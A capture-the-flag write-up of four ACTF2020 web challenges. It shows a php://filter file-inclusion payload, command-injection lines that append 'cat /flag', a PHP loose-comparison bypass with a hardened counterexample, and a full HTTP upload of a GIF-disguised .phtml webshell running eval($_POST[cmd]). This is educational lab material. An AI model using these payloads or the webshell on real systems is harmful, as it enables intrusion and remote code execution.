ACTF2020 Practice Problems

web

Include

A simple pseudo-protocol (php://filter) file inclusion.

```
?file=php://filter/convert.base64-encode/resource=flag.php
```

Then base64-decode the returned content to recover flag.php:

```php
echo "Can you find out the flag?";
//flag{9dc5b2d8-37cf-45a6-b5a3-68b3d5c6c2e5}
```

Exec

No filtering is applied; the challenge tests Linux knowledge: how to run several commands on a single line. Chain them with &&, separate them with a semicolon (;), or use the pipe symbol.

Here, however, only | and the semicolon work. (Not sure why.)

payload

```
127.0.0.1 | cat /flag
```

or

```
127.0.0.1;cat /flag
```

BackupFile

Scanning the directory reveals a backup file:

```
sunny250@kali ~ # dirb http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/ ~/web/dictionaries/CTFwebdir.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Apr 26 13:01:43 2020
URL_BASE: http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/
WORDLIST_FILES: /Users/sx/web/dictionaries/CTFwebdir.txt

-----------------

GENERATED WORDS: 53

---- Scanning URL: http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/ ----
+ http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/index.php.bak (CODE:200|SIZE:347)
+ http://5c64e8b8-c5fa-41d4-8c5e-ad84cf14332e.node3.buuoj.cn/flag.php (CODE:200|SIZE:0)

-----------------
END_TIME: Sun Apr 26 13:01:46 2020
DOWNLOADED: 53 - FOUND: 2
```

Requesting index.php.bak gives the source:

```php
<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    // only numeric-looking input gets past this gate
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    // loose comparison between an int and a string
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}
```

With a loose comparison, PHP converts types first: when a string is compared with an integer, both are converted to integers.

Reference article:

The intval function

So submitting key=123 is enough.
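To make the bug concrete, here is an added example (not the challenge's own code) that puts the challenge's check next to a strict one; it assumes PHP 7 semantics, where an int compared with a non-numeric string has the string converted to a number from its leading digits (PHP 8 changed this rule):

```php
<?php
// Added example, not from the challenge. Assumes PHP 7.x comparison rules.

const SECRET = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";

// The challenge's logic: numeric gate, intval, then == against a string.
// Under PHP 7, 123 == "123ffw..." is true, so "123" passes.
function weak_check(string $key): bool {
    if (!is_numeric($key)) {
        return false;
    }
    return intval($key) == SECRET;   // int vs string: loose comparison
}

// Hardened: no cast, no is_numeric gate; compare the raw submitted string
// with a strict, constant-time comparison.
function strict_check(string $key): bool {
    return hash_equals(SECRET, $key);
}

// Constructed sample inputs: numeric forms that intval() folds to 123,
// one numeric form that does not, and the real secret.
$cases = ["123", "123.0", "0123", "1e2", SECRET];
foreach ($cases as $c) {
    printf("%-45s weak=%s strict=%s\n", $c,
        weak_check($c) ? "pass" : "fail",
        strict_check($c) ? "pass" : "fail");
}
```

Only the real secret passes strict_check, while several short numeric strings pass weak_check.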

Upload

The challenge page shows a lamp; hovering the mouse over the bulb reveals an upload form.

Uploading 1.php directly is blocked. Trying other extensions, .phtml is accepted:

```http
POST / HTTP/1.1
Host: 32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------380150826415384369013004740571
Content-Length: 406
Origin: http://32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn
Connection: close
Referer: http://32d2077b-2b33-467c-93db-234875e1f69e.node3.buuoj.cn/
Upgrade-Insecure-Requests: 1

-----------------------------380150826415384369013004740571
Content-Disposition: form-data; name="upload_file"; filename="1.phtml"
Content-Type: image/gif

GIF89a
<script language="php">
eval($_POST[cmd]);
</script>
-----------------------------380150826415384369013004740571
Content-Disposition: form-data; name="submit"

upload
-----------------------------380150826415384369013004740571--
```

The response gives the upload path; connect to it with AntSword and read the flag.
